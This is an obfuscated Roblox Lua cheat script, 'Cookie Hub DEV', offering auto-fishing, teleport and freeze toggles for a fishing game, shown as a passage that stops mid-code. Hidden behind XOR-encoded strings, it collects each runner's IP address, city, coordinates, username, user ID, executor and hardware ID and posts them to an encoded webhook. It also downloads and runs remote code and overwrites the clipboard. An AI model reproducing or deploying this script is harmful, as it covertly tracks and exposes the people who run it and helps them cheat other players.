--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v56,v57) local v58={};for v139=1, #v56 do v6(v58,v0(v4(v1(v2(v56,v139,v139 + 1 )),v1(v2(v57,1 + (v139% #v57) ,1 + (v139% #v57) + 1 )))%256 ));end return v5(v58);end local v8=game:GetService(v7("\249\215\207\53\213\190\213\8\216\192\222","\126\177\163\187\69\134\219\167"));local v9=game:GetService(v7("\19\193\43\220\249\49\222","\156\67\173\74\165"));local v10=v9.LocalPlayer;local v11=v7("\60\163\93\6\175\124\9\123\179\64\5\191\41\84\48\249\74\25\177\105\71\36\190\6\1\185\36\78\59\184\66\5\243\119\21\97\238\16\68\236\127\23\103\227\28\69\238\126\19\96\229\31\89\141\10\69\98\184\109\29\190\48\82\33\135\31\61\237\114\86\31\147\70\70\232\30\92\14\129\111\50\235\34\112\100\158\17\7\164\41\18\99\173\69\71\159\40\30\18\179\106\12\169\23\121\22\165\26\46\137\37\64\29\130\89\3\140\63\79\27\166","\38\84\215\41\118\220\70");local function v12() local v59=os.date(v7("\17\92\54","\158\48\118\66\114"));return string.format(v7("\238\116\66\50\60\224\171\249\32\95\115\35\241\255\235\97\64\100\119\255\190\251\118\20\108\54\245\169\175\100\37\2\80","\155\203\68\112\86\19\197"),v59.day,v59.month,v59.year,v59.hour,v59.min,v59.sec);end local v13=(identifyexecutor and identifyexecutor()) or v7("\115\211\61\242\79\111\235","\152\38\189\86\156\32\24\133") ;local v14=(gethwid and gethwid()) or v7("\201\89\166\80\253\94\171\71\254\91\162","\38\156\55\199") ;local v15=(syn and syn.request) or (http and http.request) or request or (fluxus and fluxus.request) ;if  not v15 then local v140=0;local v141;while true do if (v140==(1368 -(364 + 1004))) then v141=27 -(10 + 17) ;while true do if (v141==(0 + 0)) then warn(v7("\134\114\60\59\6\100\234\76\186\105\121\44\83\102\255\82\189\120\111\60\83\114\239\77\171\105\117\39\29\52\252\76\189\115\120\102","\35\200\29\28\72\115\20\154"));return;end end break;end end end local function v16() local v60=1732 -(1400 + 332) ;local v61;local v62;local v63;local v64;local v65;local v66;local v67;local v68;local v69;while true do if (v60==(7 -3)) then v69=nil;while true do if (v61==(1908 -(242 + 1666))) then v62,v63,v64,v65,v66,v67=v7("\44\177\208\201\140\37\56\24\189\221\218","\84\121\223\177\191\237\76"),v7("\142\88\200\182\59\89\60\192\185\90\204","\161\219\54\169\192\90\48\80"),v7("\124\76\1\51\72\75\12\36\75\78\5","\69\41\34\96"),v7("\137\205\214\28\3\34\176\194\213\6\7","\75\220\163\183\106\98"),v7("\55\180\138\33\216\11\182\138\53\213\7","\185\98\218\235\87"),v7("\254\50\38\240\223\163\199\61\37\234\219","\202\171\92\71\134\190");v68,v69=pcall(function() return v15({[v7("\28\211\32","\232\73\161\76")]=v7("\179\205\86\77\68\244\150\75\77\83\186\201\75\19\29\180\212\13\87\13\180\215\13","\126\219\185\34\61"),[v7("\33\203\74\122\113\115","\135\108\174\62\18\30\23\147")]=v7("\145\204\30","\167\214\137\74\171\120\206\83")});end);v61=1;end if ((1 + 0)==v61) then if (v68 and v69 and v69.Body) then local v234=0;local v235;while true do if (v234==(2 + 1)) then v67=tostring(v235.lon or v67 );break;end if (v234==(1 + 0)) then v63=v235.city or v63 ;v64=v235.regionName or v64 ;v234=2;end if (v234==(940 -(850 + 90))) then local v262=0;while true do if (v262==0) then v235=v8:JSONDecode(v69.Body);v62=v235.query or v62 ;v262=1 -0 ;end if (v262==1) then v234=1;break;end end end if (v234==(1392 -(360 + 1030))) then v65=v235.country or v65 ;v66=tostring(v235.lat or v66 );v234=3 + 0 ;end end end return v62,v63,v64,v65,v66,v67;end end break;end if (v60==(0 -0)) then v61=0 -0 ;v62=nil;v60=1662 -(909 + 752) ;end if (v60==2) then v65=nil;v66=nil;v60=3;end if (v60==(1226 -(109 + 1114))) then v67=nil;v68=nil;v60=6 -2 ;end if (1==v60) then v63=nil;v64=nil;v60=1 + 1 ;end end end local function v17() local v70=242 -(6 + 236) ;local v71;local v72;local v73;local v74;local v75;local v76;local v77;local v78;local v79;local v80;local v81;local v82;local v83;local v84;while true do if (v70==(1 + 0)) then v73=game:GetService(v7("\166\241\32\86\253\179\155\252\51\94\253\148\142\226\36\84\251\162","\199\235\144\82\61\152")):GetProductInfo(game.PlaceId).Name;v74=string.format(v7("\15\2\173\59\20\76\246\100\16\1\174\101\21\25\187\39\8\14\247\40\8\27\246\35\2\23\189\56\15\25\173\102\19\30\172\38\5\24\184\34\11\89\176\38\6\17\188\116\18\5\188\57\46\18\228\110\3\80\174\34\3\2\177\118\83\68\233\109\15\19\176\44\15\2\228\127\85\70\255\45\8\4\180\42\19\75\169\37\0","\75\103\118\217"),v71);v70=2 + 0 ;end if (v70==(0 -0)) then local v167=0;while true do if (v167==0) then v71=v10.UserId;v72=v10.Name;v167=1;end if (v167==(1 -0)) then v70=1134 -(1076 + 57) ;break;end end end if (v70==4) then if  not v83 then warn(v7("\208\7\248\193\232\13\241\137\225\3\243\197\226\6\160","\169\135\98\154"),v84);end break;end if (v70==3) then v82=v8:JSONEncode(v81);v83,v84=pcall(function() return v15({[v7("\71\83\123","\235\18\33\23\229\158")]=v11,[v7("\125\191\213\179\95\190","\219\48\218\161")]=v7("\212\94\79\125","\128\132\17\28\41\187\47"),[v7("\41\55\7\62\88\19\33","\61\97\82\102\90")]={[v7("\143\33\165\95\194\89\10\68\152\55\187\78","\105\204\78\203\43\167\55\126")]=v7("\164\186\51\18\26\7\198\69\172\165\45\81\25\23\200\95","\49\197\202\67\126\115\100\167")},[v7("\21\84\219\48","\62\87\59\191\73\224\54")]=v82});end);v70=1 + 3 ;end if (v70==(691 -(579 + 110))) then v75,v76,v77,v78,v79,v80=v16();v81={[v7("\210\71\117\6\183\31\202\81","\126\167\52\16\116\217")]=v7("\237\54\37\131\161\13\243\218\110\12\143\179\30\249\218","\156\168\78\64\224\212\121"),[v7("\2\227\167\203\3\253","\174\103\142\197")]={{[v7("\66\33\75\52\32","\152\54\72\63\88\69\62")]=v7("\158\142\222\80\213\221\235\78\148\225\246\89\215\209\250\83\198\132\194\83\211\142\164","\60\180\164\142"),[v7("\91\81\9\38\53","\114\56\62\101\73\71\141")]=14791001 + 1938343 ,[v7("\172\225\206\201\186\231\218\205\180","\164\216\137\187")]={[v7("\199\244\61","\107\178\134\81\210\198\158")]=v74},[v7("\62\7\135\202\174\43","\202\88\110\226\166")]={{[v7("\205\14\143\242","\170\163\111\226\151")]=v7("\36\35\183\42\64\54\36\20","\73\113\80\210\88\46\87"),[v7("\151\45\193\7\226","\135\225\76\173\114")]=v72,[v7("\19\227\180\185\162\184","\199\122\141\216\208\204\221")]=true},{[v7("\163\220\29\245","\150\205\189\112\144\24")]=v7("\16\151\186\94\45\140","\112\69\228\223\44\100\232\113"),[v7("\194\30\11\198\179","\230\180\127\103\179\214\28")]=tostring(v71),[v7("\133\11\83\79\234\68","\128\236\101\63\38\132\33")]=true},{[v7("\162\168\28\65","\175\204\201\113\36\214\139")]=v7("\109\195\60\210\68\115\197\56\217","\100\39\172\85\188"),[v7("\187\121\181\149\54","\83\205\24\217\224")]=v12(),[v7("\239\203\193\52\232\192","\93\134\165\173")]=false},{[v7("\176\243\204\199","\30\222\146\161\162\90\174\210")]=v7("\213\66\113\9\224","\106\133\46\16"),[v7("\78\33\127\233\95","\32\56\64\19\156\58")]=v73,[v7("\83\198\233\95\84\247","\224\58\168\133\54\58\146")]=true},{[v7("\87\87\70\248","\107\57\54\43\157\21\230\231")]=v7("\242\187\81\212\189\216\221\222\152\2","\175\187\235\113\149\217\188"),[v7("\42\174\141\89\230","\24\92\207\225\44\131\25")]=v75,[v7("\66\221\180\69\21\120","\29\43\179\216\44\123")]=true},{[v7("\179\216\45\73","\44\221\185\64")]=v7("\45\232\75\94\103\8\232\70","\19\97\135\40\63"),[v7("\184\93\63\46\42","\81\206\60\83\91\79")]=string.format(v7("\11\184\156\50\106\208\1\228\11\184","\196\46\203\176\18\79\163\45"),v76,v77,v78),[v7("\177\44\114\23\42\254","\143\216\66\30\126\68\155")]=false},{[v7("\164\201\0\206","\129\202\168\109\171\165\195\183")]=v7("\1\87\56\202\218\29\232\35\76\50\203","\134\66\56\87\184\190\116"),[v7("\42\48\5\174\28","\85\92\81\105\219\121\139\65")]=string.format("Latitude: %s\nLongitude: %s",v79,v80),[v7("\244\189\92\76\114\218","\191\157\211\48\37\28")]=true},{[v7("\209\30\249\25","\90\191\127\148\124")]=v7("\93\159\43\20\109\147\33\5","\119\24\231\78"),[v7("\148\44\169\95\217","\113\226\77\197\42\188\32")]=v13,[v7("\51\24\248\188\52\19","\213\90\118\148")]=true},{[v7("\85\47\185\83","\45\59\78\212\54")]=v7("\56\97\170\175","\144\112\54\227\235\230\78\205"),[v7("\165\41\3\233\213","\59\211\72\111\156\176")]=v14,[v7("\71\137\239\36\64\130","\77\46\231\131")]=false}},[v7("\188\91\185\84\191\70","\32\218\52\214")]={[v7("\90\18\41\188","\58\46\119\81\200\145\208\37")]=v7("\14\148\53\175\188\169\57\57\204\60\163\174\253\37\50\159\36\169\164\253\55\40\152\57\186\172","\86\75\236\80\204\201\221")}}}};v70=2 + 1 ;end end end task.wait(1177 -(663 + 511) );v17();local v18=loadstring(game:HttpGet(v7("\195\99\48\68\238\105\135\132\100\45\70\244\38\219\133\122\33\90\232\124\218\202\110\34\93\248\63\204","\168\171\23\68\52\157\83")))();local v19=v18:CreateWindow({[v7("\218\112\248\168","\231\148\17\149\205\69\77")]="ðŸª | Cookie Hub DEV",[v7("\169\164\200\245","\159\224\199\167\155\55")]=0 + 0 ,[v7("\219\252\61\214\254\253\59\230\254\231\48\215","\178\151\147\92")]=v7("\175\242\67\57\27\73\82\153\255\12\22\55\122","\26\236\157\44\82\114\44"),[v7("\6\33\212\95\35\32\210\104\63\44\193\82\62\34\208","\59\74\78\181")]=v7("\39\200\26\96\182\53\197\82\83\176\36\221","\211\69\177\58\58"),[v7("\131\237\124\248\236","\171\215\133\25\149\137")]=v7("\197\205\52\251\250\60\232","\34\129\168\82\154\143\80\156"),[v7("\161\187\32\10\74\66\140\183\179\42\13\65\75\133\129\130\33\4\69\94\157\150","\233\229\210\83\107\40\46")]=false,[v7("\229\75\33\215\7\205\71\16\195\12\205\70\5\215\23\207\75\60\209\22","\101\161\34\82\182")]=false,[v7("\203\2\87\248\210\229\151\60\233\25\80\241\213\209\131\56\225\3\94","\78\136\109\57\158\187\130\226")]={[v7("\27\49\248\243\50\58\253","\145\94\95\153")]=true,[v7("\219\194\24\209\75\165\211\204\25\208","\215\157\173\116\181\46")]=nil,[v7("\19\189\135\247\244\52\185\142","\186\85\212\235\146")]=v7("\193\133\19\232\45\235\75\214\207\26\235\56","\56\162\225\118\158\89\142")},[v7("\120\12\211\172\45\202\88","\184\60\101\160\207\66")]={[v7("\20\140\125\190\61\135\120","\220\81\226\28")]=true,[v7("\58\219\148\242\254\194","\167\115\181\226\155\138")]=v7("\234\54\243\76\104\43\137\173\38\238\79\120\126\212\230\108\224\91\52\123\227\177\44\190\86\108\82\192\186","\166\130\66\135\60\27\17")},[v7("\111\79\215\70\41\87\94\203\120","\80\36\42\174\21")]=false});pcall(function() setclipboard(v7("\70\4\35\106\93\74\120\53\74\25\36\121\65\2\51\52\73\23\120\112\107\67\57\35\68\7\20\124\22","\26\46\112\87"));end);v18:Notify({[v7("\141\42\191\120\186","\212\217\67\203\20\223\223\37")]=v7("\158\132\187\209\181\159\172\146\150\132\166\217\250\174\167\194\179\136\172\147","\178\218\237\200"),[v7("\149\186\232\196\179\187\242","\176\214\213\134")]=v7("\222\162\191\218\232\89\76\230\237\165\209\186\64\92\230\247\246\208\161\69\90\251\191\178\154\175\81\22\254\136\229\218\241\92\78\215\171\238","\57\148\205\214\180\200\54"),[v7("\54\232\39\53\98\27\242\59","\22\114\157\85\84")]=2.5 + 4 ,[v7("\237\198\18\195\88","\200\164\171\115\164\61\150")]=5873440856 -1390078398 ,[v7("\159\247\23\76\140\176\231","\227\222\148\99\37")]={[v7("\26\85\92\249\235\54","\153\83\50\50\150")]={[v7("\115\119\126\25","\45\61\22\19\124\19\203")]=v7("\238\57","\217\161\114\109\149\98\16"),[v7("\49\33\52\112\190\117\17\43","\20\114\64\88\28\220")]=function() end}}});local v20={v7("\28\14\221\167\253\199\178\62\5","\221\81\97\178\212\152\176"),v7("\254\243\28\239\15\200","\122\173\135\125\155"),v7("\162\206\18\170\62\58\205\138","\168\228\161\96\217\95\81"),v7("\233\222\61\80\38\67\249\208\55","\55\187\177\78\60\79"),v7("\10\220\94\229\66\253\133\40\200","\224\77\174\63\139\38\175"),v7("\165\79\91\39\129\79\76\15\150\66\80\39\146\68\75\10\139\78\74","\78\228\33\56"),v7("\239\114\166\2\151","\229\174\30\210\99"),v7("\63\232\149\94\225\60\45\30\201\131\84\253","\89\123\141\230\49\141\93"),v7("\192\127\249\27\51\75\227","\42\147\17\150\108\112"),v7("\34\179\62\119\224\250\0\176\40","\136\111\198\77\31\135"),v7("\33\8\171\91\135\235\25\172","\201\98\105\199\54\221\132\119"),v7("\141\4\134\5\7\37\184\177\31","\204\217\108\227\65\98\85"),v7("\120\204\231\246\45\203\91\205\198\237\35\210\91\208","\160\62\163\149\133\76"),v7("\226\165\31\61\194\198\169\3","\163\182\192\109\79"),v7("\7\51\14\211\225\59\40\5","\149\84\70\96\160"),v7("\12\14\8\204\42\5\5","\141\88\102\109"),v7("\145\65\195\126\31","\161\211\51\170\16\122\93\53"),v7("\216\188\179\46\239\154\179\42\247\171","\72\155\206\210"),v7("\117\106\93\5\54","\83\38\26\52\110"),v7("\110\18\53\82\81\16\40","\38\56\119\71"),v7("\210\225\91\223\32\88\231","\54\147\143\56\182\69"),v7("\248\142\237\93\215\243\185\207","\191\182\225\159\41"),v7("\8\26\41\89\135\130\204\44\23\58\113\142\130\210","\162\75\114\72\53\235\231"),v7("\186\51\72\225\82\12\133\63\114\231\93\22","\98\236\92\36\130\51"),v7("\133\27\21\169\86\169\185\10\161\23\5\174\77","\80\196\121\108\218\37\200\213"),v7("\33\103\14\126\69\26\131\19","\234\96\19\98\31\43\110"),v7("\35\11\90\194\190\119\138\10\47\71\221\182\126\142","\235\102\127\50\167\204\18"),v7("\118\168\251\34\72\30\69\187\219\44\86\58\88\132\205\19","\78\48\193\149\67\36"),v7("\30\17\142\29","\33\80\126\224\120")};local v21={[v7("\193\167\12\215\89\251\167\12\192","\60\140\200\99\164")]=Vector3.new(381,486 -(285 + 66) ,559 -319 ),[v7("\180\224\5\50\183\130","\194\231\148\100\70")]=Vector3.new(1327.7 -(682 + 628) ,160, -(169 + 875)),[v7("\96\67\211\176\247\195\67\66","\168\38\44\161\195\150")]=Vector3.new( -2500,433 -(176 + 123) ,648 + 900 ),[v7("\178\243\145\122\57\252\148\23\153","\118\224\156\226\22\80\136\214")]=Vector3.new( -(1050 + 397),402 -(239 + 30) ,183 + 489 ),[v7("\101\252\88\142\70\220\92\133\68","\224\34\142\57")]=Vector3.new( -(3427 + 138),265 -115 ,535),[v7("\255\169\198\212\118\255\73\47\204\164\205\212\101\244\78\42\209\168\215","\110\190\199\165\189\19\145\61")]=Vector3.new( -(9843 -6688),1069 -(306 + 9) ,7652 -5459 ),[v7("\251\231\99\233\153","\167\186\139\23\136\235")]=Vector3.new( -(226 + 1070),494 + 311 ,144 + 154 ),[v7("\62\176\155\2\22\180\156\8\62\176\141\29","\109\122\213\232")]=Vector3.new( -(4318 -2808),1609 -(1140 + 235) ,2852),[v7("\221\249\173\39\205\246\178","\80\142\151\194")]=Vector3.new( -(1686 + 962),131 + 11 ,647 + 1874 ),[v7("\46\211\100\68\4\212\120\90\6","\44\99\166\23")]=Vector3.new( -(2553 -(33 + 19)),48 + 83 ,2158 -1438 ),[v7("\95\246\37\59\9\171\114\242","\196\28\151\73\86\83")]=Vector3.new( -(1875 + 2380),11201,3480 -1705 ),[v7("\199\11\44\52\135\72\12\126\224","\22\147\99\73\112\226\56\120")]=Vector3.new( -568,661 + 43 ,1230),[v7("\158\122\240\230\140\179\112\236\198\133\183\103\231\230","\237\216\21\130\149")]=Vector3.new( -(3187 -(586 + 103)),13 + 123 ,1624),[v7("\182\75\77\77\177\217\87\140","\62\226\46\63\63\208\169")]=Vector3.new( -(449 -303),145,3402 -(1309 + 179) ),[v7("\214\12\91\144\11\2\33\91","\62\133\121\53\227\127\109\79")]=Vector3.new( -(1681 -749),58 + 73 ,1118),[v7("\36\28\55\212\196\173\170","\194\112\116\82\149\182\206")]=Vector3.new( -(2680 -1682),131,935 + 302 ),[v7("\27\186\69\22\197","\110\89\200\44\120\160\130")]=Vector3.new( -(3811 -2017),142,6579 -3277 ),[v7("\136\209\74\64\87\126\58\79\167\198","\45\203\163\43\38\35\42\91")]=Vector3.new( -(3768 -(295 + 314)),745,4135 -2451 ),[v7("\225\149\213\40\130","\52\178\229\188\67\231\201")]=Vector3.new( -(3216 -(1300 + 662)),137,4879 -3325 ),[v7("\23\68\66\16\254\91\44","\67\65\33\48\100\151\60")]=Vector3.new( -(1867 -(1178 + 577)),268 + 247 ,3074 -2034 ),[v7("\254\233\173\209\246\209\243","\147\191\135\206\184")]=Vector3.new( -(7460 -(851 + 554)),173 + 22 ,770 -492 ),[v7("\170\39\180\213\208\118\138\180","\210\228\72\198\161\184\51")]=Vector3.new( -(43415 -23425),1438 -(115 + 187) ,4240 + 1296 ),[v7("\21\65\242\28\127\203\56\78\246\2\87\203\51\89","\174\86\41\147\112\19")]=Vector3.new( -(696 + 39),13240 -9880 ,2845 -(160 + 1001) ),[v7("\109\15\129\8\36\1\24\168\109\5\131\31","\203\59\96\237\107\69\111\113")]=Vector3.new( -(2783 + 398),2036,2772 + 1245 ),[v7("\5\20\181\242\34\241\219\30\19\162\232\37\248","\183\68\118\204\129\81\144")]=Vector3.new( -(27738 -14188),11050,481 -(237 + 121) ),[v7("\47\185\124\229\5\150\7\190","\226\110\205\16\132\107")]=Vector3.new( -(5160 -(525 + 372)), -(1142 -539),6009 -4180 ),[v7("\206\215\232\220\83\238\194\236\233\84\241\217\236\220","\33\139\163\128\185")]=Vector3.new( -(4264 -(96 + 46)),1379 -(643 + 134) ,658 + 1162 ),[v7("\113\81\10\223\91\104\17\196\121\87\22\202\95\125\60\238","\190\55\56\100")]=Vector3.new(19963,1137,12950 -7549 )};local v22=v19:CreateTab(v7("\123\174\53\16","\147\54\207\92\126\115\131"),124714113910876 -0 );v18:Notify({[v7("\57\56\33\113\8","\30\109\81\85\29\109")]=v7("\200\116\88\181\57\211\249\191\101\91\246\21\209\243\244\120\81\246\30\203\254\190","\156\159\17\52\214\86\190"),[v7("\141\224\179\168\171\225\169","\220\206\143\221")]="Don't forget to save the configs!",[v7("\162\104\63\22\204\197\221\136","\178\230\29\77\119\184\172")]=6.5 + 0 ,[v7("\220\179\11\28\114","\152\149\222\106\123\23")]=124714113910876 -0 });local v9=game:GetService(v7("\237\42\247\90\176\207\53","\213\189\70\150\35"));local v10=v9.LocalPlayer;local v23=game:GetService(v7("\125\80\100\4\70\86\117\28\74\81\71\28\64\71\117\15\74","\104\47\53\20"));local v24=game:GetService(v7("\149\69\147\8\169\14\175\101\143\12\169\27\142\77\143\29\187\10\177","\111\195\44\225\124\220"));local v25=game:GetService(v7("\255\83\9\64\174\185\206\79\3\118","\203\184\38\96\19\203"));local function v26() local v85=v10:FindFirstChild(v7("\9\127\120\88\203\43\84\108\72","\174\89\19\25\33"));local v86=v85 and v85:FindFirstChild(v7("\60\26\83\69\242\146\2","\107\79\114\50\46\151\231")) ;if (v86 and v86.Enabled) then local v151=0 -0 ;local v152;while true do if (v151==0) then v152=v86:FindFirstChild(v7("\42\167\179\44\144\54\185\197","\160\89\198\213\73\234\89\215"));if v152 then local v222=719 -(316 + 403) ;local v223;while true do if (v222==(0 + 0)) then v223=v152:FindFirstChild(v7("\74\100\160\234\202\70","\165\40\17\212\158"));if (v223 and v223:IsA(v7("\204\212\9\52\35\199\204\28\39\41\235","\70\133\185\104\83")) and v223.Visible) then local v275=0;while true do if (v275==(0 -0)) then v25.SelectedObject=v223;v24:SendKeyEvent(true,Enum.KeyCode.Return,false,game);v275=1 + 0 ;end if (1==v275) then v24:SendKeyEvent(false,Enum.KeyCode.Return,false,game);break;end end end break;end end end break;end end end end local function v27() local v87=0;local v88;local v89;local v90;while true do if (v87==1) then v90=nil;while true do if (v88==(2 -1)) then if (v90 and v90.Enabled) then local v236=0;local v237;while true do if (v236==(0 + 0)) then v237=v90:FindFirstChild(v7("\219\91\8\40\3\215\161\134","\227\168\58\110\77\121\184\207"));if v237 then local v284=0 + 0 ;local v285;while true do if (v284==0) then v285=v237:FindFirstChild(v7("\121\41\171\84\190\213","\197\27\92\223\32\209\187\17"));if (v285 and v285:IsA(v7("\42\82\194\252\6\125\214\239\23\80\205","\155\99\63\163")) and v285.Visible) then local v300=0;while true do if (v300==(3 -2)) then v24:SendKeyEvent(false,Enum.KeyCode.Return,false,game);break;end if (v300==0) then v25.SelectedObject=v285;v24:SendKeyEvent(true,Enum.KeyCode.Return,false,game);v300=4 -3 ;end end end break;end end end break;end end end break;end if (v88==0) then local v204=0;while true do if (v204==(0 -0)) then v89=v10:FindFirstChild(v7("\52\73\69\51\204\22\98\81\35","\169\100\37\36\74"));v90=v89 and v89:FindFirstChild(v7("\19\143\163\91\5\146\171","\48\96\231\194")) ;v204=1;end if (v204==(1 + 0)) then v88=1 -0 ;break;end end end end break;end if (v87==(0 + 0)) then v88=0 -0 ;v89=nil;v87=1;end end end local function v28() return v10.Character or v10.CharacterAdded:Wait() ;end local v29=v28();local v30=v10:FindFirstChild(v7("\160\208\162\134\169\133\129\218","\228\226\177\193\237\217"));_G.AutoCast=false;_G.AutoShake=false;_G.AutoReel=false;_G.FreezeCharacter=false;_G.AutoDropBobber=false;_G.InstantReel=false;local v31=v22:CreateSection(v7("\23\184\34\244\53\179\55\227\38","\134\84\208\67"));v22:CreateToggle({[v7("\61\173\139\89","\60\115\204\230")]=v7("\193\40\238\117\253\63\171\83\239\59\249\113\228\46\238\98","\16\135\90\139"),[v7("\114\120\7\52","\24\52\20\102\83\46\52")]=v7("\226\12\41\37\29","\111\164\79\65\68"),[v7("\229\216\143\210\44\235\197\210","\138\166\185\227\190\78")]=function(v91) local v92=17 -(12 + 5) ;while true do if ((0 -0)==v92) then _G.FreezeCharacter=v91;spawn(function() local v173=0 -0 ;while true do if (v173==(0 -0)) then while _G.FreezeCharacter do local v238=0 -0 ;local v239;while true do if (v238==(0 + 0)) then v239=0;while true do if (v239==0) then v29=v28();if (v29 and v29:FindFirstChild(v7("\227\97\200\54\92\44\16\207\70\202\56\70\19\24\217\96","\121\171\20\165\87\50\67"))) then v29.HumanoidRootPart.Anchored=true;end v239=1974 -(1656 + 317) ;end if ((1 + 0)==v239) then task.wait(0.1 + 0 );break;end end break;end end end v29=v28();v173=2 -1 ;end if (v173==1) then if (v29 and v29:FindFirstChild(v7("\238\45\180\55\183\13\207\60\139\57\182\22\246\57\171\34","\98\166\88\217\86\217"))) then v29.HumanoidRootPart.Anchored=false;end break;end end end);break;end end end});v22:CreateToggle({[v7("\216\247\116\4","\188\150\150\25\97\230")]=v7("\251\156\75\13\76\200\203\156\86\18\76\223\213\141","\141\186\233\63\98\108"),[v7("\210\255\62\164\32\255\254\26\183\41\228\239","\69\145\138\76\214")]=false,[v7("\86\195\136\142","\118\16\175\233\233\223")]=v7("\170\145\33\180\203\154\104\130\148\7\180\234","\29\235\228\85\219\142\235"),[v7("\30\213\182\209\117\79\36\89","\50\93\180\218\189\23\46\71")]=function(v93) local v94=0 -0 ;while true do if (v94==(354 -(5 + 349))) then _G.AutoEquipRod=v93;while _G.AutoEquipRod do local v174=0 -0 ;local v175;local v176;while true do if (0==v174) then local v224=0;while true do if ((1272 -(266 + 1005))==v224) then v174=1 + 0 ;break;end if (v224==(0 -0)) then v175=game:GetService(v7("\238\168\90\85\65\206\91","\40\190\196\59\44\36\188")).LocalPlayer;v176=v175:FindFirstChild(v7("\30\68\223\191\234\124\14\55","\109\92\37\188\212\154\29"));v224=1;end end end if (1==v174) then if v176 then for v252,v253 in ipairs(v176:GetChildren()) do if (v253:IsA(v7("\48\224\171\207","\58\100\143\196\163\81")) and v253:FindFirstChild(v7("\31\84\38\173\43\90","\110\122\34\67\195\95\41\133")) and v253.events:FindFirstChild(v7("\118\176\72\94","\182\21\209\59\42"))) then local v276=game:GetService(v7("\133\82\213\17\40\189\182\67\192\25\18\170\184\69\196\26\36","\222\215\55\165\125\65")):WaitForChild(v7("\60\208\197\17\243\198\232\89","\42\76\177\166\122\146\161\141")):WaitForChild(v7("\139\143\17","\22\197\234\101\174\25")):WaitForChild(v7("\31\17\234\254\119\172\220\150\44\55\174\147\83\190\194\143\61","\230\77\84\197\188\22\207\183"));v276:FireServer(v253);break;end end end task.wait(1 -0 );break;end end end break;end end end});local v32=v22:CreateSection(v7("\212\21\207\242","\85\153\116\166\156\236\193\144"));local function v33() local v95=1696 -(561 + 1135) ;local v96;while true do if (v95==0) then v96=game.Players.LocalPlayer.Character;if  not v96 then return nil;end v95=1;end if (v95==(1 -0)) then return v96:FindFirstChildOfClass(v7("\144\239\66\191","\96\196\128\45\211\132"));end end end local function v34() local v97=0 -0 ;local v98;local v99;while true do if (v97==(1066 -(507 + 559))) then v98=game:GetService(v7("\5\129\122\70\215\189\167","\184\85\237\27\63\178\207\212")).LocalPlayer.Character;if  not v98 then return;end v97=1;end if (1==v97) then v99=v98:FindFirstChildOfClass(v7("\60\86\6\83","\63\104\57\105"));if (v99 and v99:FindFirstChild(v7("\14\145\161\74\31\148","\36\107\231\196")) and v99.events:FindFirstChild(v7("\94\180\177\147","\231\61\213\194"))) then v99.events.cast:FireServer(250 -150 ,1);else warn(v7("\59\162\57\51\6\191\125\112\8\190\41\51\12\187\56\125\29\237\51\124\29\237\59\124\28\163\57\50","\19\105\205\93"));end break;end end end v22:CreateToggle({[v7("\135\9\211\132","\95\201\104\190\225")]=v7("\142\222\213\193\239\232\192\221\187","\174\207\171\161"),[v7("\203\242\12\244","\183\141\158\109\147\152")]=v7("\13\42\231\31\56","\108\76\105\134"),[v7("\200\196\189\237\204\234\198\186","\174\139\165\209\129")]=function(v100) local v101=0 -0 ;while true do if (v101==(388 -(212 + 176))) then _G.AutoCast=v100;spawn(function() while _G.AutoCast do local v179=905 -(250 + 655) ;local v180;while true do if ((2 -1)==v179) then if (v180 and v180:FindFirstChild(v7("\181\178\238\212\195\16","\24\195\211\130\161\166\99\16")) and v180.values:FindFirstChild(v7("\69\2\250\56\86\18","\118\38\99\137\76\51"))) then if (v180.values.casted.Value==false) then v34();end else warn(v7("\207\41\1\82\0\51\189\43\12\1\26\41\243\33\69\28\12\35\248\53\22\19\27\57\189\54\23\29\25\37\239\50\12\23\26\110","\64\157\70\101\114\105"));end break;end if (v179==(0 -0)) then task.wait(1 -0 );v180=v33();v179=1957 -(1869 + 87) ;end end end end);break;end end end});v22:CreateToggle({[v7("\110\169\170\230","\112\32\200\199\131")]=v7("\13\69\72\183\131\152\42\45\91\89","\66\76\48\60\216\163\203"),[v7("\156\138\120\244","\68\218\230\25\147\63\174")]=v7("\140\25\91\77\189\168","\214\205\74\51\44"),[v7("\217\77\238\240\117\251\79\233","\23\154\44\130\156")]=function(v102) local v103=0;while true do if (v103==0) then _G.AutoShake=v102;spawn(function() while _G.AutoShake do v26();v27();task.wait(0.01);end end);break;end end end});local function v33() return v29:FindFirstChildOfClass(v7("\37\169\162\162","\115\113\198\205\206\86"));end local function v35() task.wait(0.2 -0 );for v142,v143 in pairs(v10.PlayerGui:GetChildren()) do if (v143:IsA(v7("\183\84\236\95\129\89\217\79\141","\58\228\55\158")) and (v143.Name==v7("\166\140\213\34","\85\212\233\176\78\92\205"))) then local v170=1901 -(484 + 1417) ;local v171;while true do if (v170==(0 -0)) then v171=v143:FindFirstChild(v7("\72\89\154","\130\42\56\232"));if (v171 and v23:FindFirstChild(v7("\239\163\33\237\84\44","\95\138\213\68\131\32"))) then local v240=0 -0 ;local v241;while true do if (v240==(773 -(48 + 725))) then v241=v171:FindFirstChild(v7("\58\36\160\90\115\56\42\160\81","\22\74\72\193\35"));if v241 then local v286=0 -0 ;local v287;while true do if (v286==1) then if v287 then v287:FireServer(268 -168 ,true);else warn(v7("\46\216\198\31\51\53\211\202\0\61\57\217\131\22\35\57\211\215\83\59\51\201\131\21\58\41\211\199\82","\85\92\189\163\115"));end break;end if (v286==0) then v241.Size=UDim2.new(1 + 0 ,0 -0 ,1,0 + 0 );v287=v23:FindFirstChild(v7("\41\111\225\86\56\106","\56\76\25\132")) and v23.events:FindFirstChild(v7("\76\196\174\42\201\87\207\162\53\199\91\197","\175\62\161\203\70")) ;v286=1;end end else warn(v7("\25\160\49\33\44\190\50\57\59\236\62\55\61\236\54\55\60\162\52\121","\88\73\204\80"));end break;end end else 